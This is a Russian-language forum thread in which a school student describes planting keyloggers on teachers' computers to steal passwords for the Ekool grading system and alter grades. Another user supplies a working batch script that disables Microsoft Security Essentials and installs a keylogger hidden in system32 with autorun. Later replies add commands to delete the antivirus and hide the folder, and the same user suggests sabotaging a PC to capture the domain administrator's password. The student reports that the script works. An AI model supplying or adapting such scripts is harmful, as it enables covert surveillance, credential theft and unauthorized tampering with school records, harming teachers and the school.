Задача со сложностью
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Задача со сложностью - 2011-11-03 20:25:22.640000
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
Кто я и чем занимаюсь Я - гимназист, ставлю кейлогеры на компьютеры учителей, из логов достаю пароли для системы Ekool, тем самым меняю оценки. Инфо. о компах В ассортименте стационарные компьютеры и ноутбуки, ОС - семейство Windows (Win XP, Win 7,Win Vista), в основном, где-то на 95% - ХР, но меня так же интересуют компьютеры на Vista, поскольку там можно собрать больше всего паролей. Все подключены к школьной сети посредством кабеля. На каждом компьютере есть антивирус - Microsoft Security Essentials. Процесс действий Во время того, как препод. выходить из класса или вообще отсутсвует в классе долгое время, я получаю физ. доступ к компьютеру, в то время, как мой напарник стоит на стрёме. Моя задача: Спрятать на компьютере кейлогер. Всё бы да ничего, однако времени обычно бывает около 3-6мин, потом, естественно, уже приходит препод + наличие Прав Администратора на машине, у пользователя препода. Конкретно 0. Проверяю имеет ли пользователь права администратора (далее как ПА) 1. У меня в наличии флэшка, на которой установлен Ccleaner (далее как "клинер") и есть кейлогер. 2. Первым делом я запускаю клинер и сношу антивирус (Microsoft Security Essentials) 3. Прячу кейлогер (C:\Windows\System32\doc) и запускаю его 4. Проверяю через клинер наличие кейлогера в автозапуске Проблема Из всего выше можно вынести 2 проблемы: 1 - время, 2 - ПА Всё чаще стал замечать, что наш школьный ИТ-спец. ставит пользователю препода ограниченные права, из-за чего я не могу снести антивирус и запустить кейлогер. Решение Бывает, когда препод. болеет и у нашего класса свободный урок в кабинете + я имею полный доступ к компьютеру и 45мин времени(время урока), при условии, что это стационырный комп, поскольку ноутбуки преподователи забирают с собой домой.(Но не всегда) При наличии большого кол-ва времени я гружусь с ERD и убираю пароль админа, а дальше всё по плану. Но такая возможность выпадает крайне редко, почти не выпадает. Итого Нужно сделать так, чтоб я мог уложиться в короткое время и запустить что-то, что сможет дать мне ПА или попасть под учётную запись Администратора. Потому что нужно выполнить 2 простых действия - снести антивирус и запустить кейлогер. Я подумывал над каким-нибудь мощненьким вирусом, который убьёт данный антивирус и уберёт из автозагрузки, после чего я смогу залить и запустить кейлогер. Так же подумывал над упрощением моей задачи, при наличии ПА. Допустим создать програмку, которая сама снесёт антивирус MSE (на всех компах он на диске С в стандартной папке своей), копирнёт и спрячет (спрячет в папке Windows и сделает невидимой) кейлогер с последующим его запуском. К сожалению, я не владею языками написания сией программы, но идея хорошая. Обращаюсь к вам, Господам хакерам и продвинутым юзерам, за помощью над решением моей проблемки. Пишите доп. вопросы - постараюсь ответить предельно ясно. Любой помощи буду крайне благодарен, Заранее всем Спасибо!
|
|
|
RE: Задача со сложностью - 2011-11-04 00:10:00.313333
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
1. Cеть доменная или просто рабочая группа? (мой компьютер - свойства - имя компьютера - изменить) 2. На XP можно попробовать соорудить батничек (завтра в свободное время попробую), но на висте-7 это не прокатит - UAC не даст. 3. Есть ли у компов доступ в инет?
|
|
|
RE: Задача со сложностью - 2011-11-04 00:48:26.036666
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
namepunk 1.Сеть доменная 2.За батничек буду крайне благодарен, если не сложно, добавь потом пояснение, что он делает, а то могу не разобраться полностью, открыв его с блокнотом. 3.Доступ в инет конечно имеется, иначе как бы они заходили в Ekool (ekool.ee), а я бы у них угонял пароли кейлогером + кейлогер отсылает мне логи на почтовый ящик. Извиняюсь, за то, что не уточнил про Ekool. Ekool - Interneti Kool, что с эстонского значит - Интернет школа, нам там оценки и дз пишут и тп.
|
|
|
RE: Задача со сложностью - 2011-11-04 18:34:35.743333
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
quote:
1.Сеть доменная Если словить пароль администратора домена - вот тут можно будет развернуться. Если обновления не ставяться, можно попробовать посканировать сервера на уязвимости. Либо сделать преподу свинью, у которого админских прав нет и подождать пока ваш админ придет чинить. Он введет свой пароль. quote:
2.За батничек буду крайне благодарен, если не сложно, добавь потом пояснение, что он делает, а то могу не разобраться полностью, открыв его с блокнотом. Времени не было сегодня проверить, но думаю что-то вроде такого…Проверь у себя на виртуалке. rem Останавливаем антивирус и убираем его из автозагрузки.
sc stop msmpsvc
sc config msmpsvc start= disabled
rem можно убрать само приложение из автозапуска чтобы не светилось красным
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "MSC" /f
rem создаем папку для кейлоггера
md c:\windows\system32\doc
rem копируем кейлоггер (предполагаеться что он лежит в папке keylogger, которая находиться рядом с батником)
copy .\keylogger\*.* c:\windows\system32\doc\*.*
rem добавляем его в автозагрузку
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v docs /d "c:\windows\system32\doc\keylogger.exe"
rem запускаем кейлоггер
start c:\windows\system32\doc\keylogger.exe
|
|
|
RE: Задача со сложностью - 2011-11-13 20:26:20.813333
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
quote:
Либо сделать преподу свинью, у которого админских прав нет и подождать пока ваш админ придет чинить. Он введет свой пароль. Тогда как же мы отследим пароль, который он введёт? Какого типа свинью можно придумать? Ваш батник немного изменил под себя и он полностью работает, большое спасибо! Ещё такой вопрос: А можно также дописать в батник, чтоб он скрыл папку doc (c:\windows\system32\doc\) и удалил антивирус вообще? Если что-то из этого можно сделать, могли бы показать команды?
|
|
|
RE: Задача со сложностью - 2011-11-13 21:02:35.230000
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
1. Зачем удалять антивирус если он и так не работает? Но если надо то что-то вроде rmdir /s /q "c:\program files\antivirus" 2. чтобы скрыть папку используй что-то вроде attrib +R +S +H c:\windows\system32\doc /D
|
|
|
|
|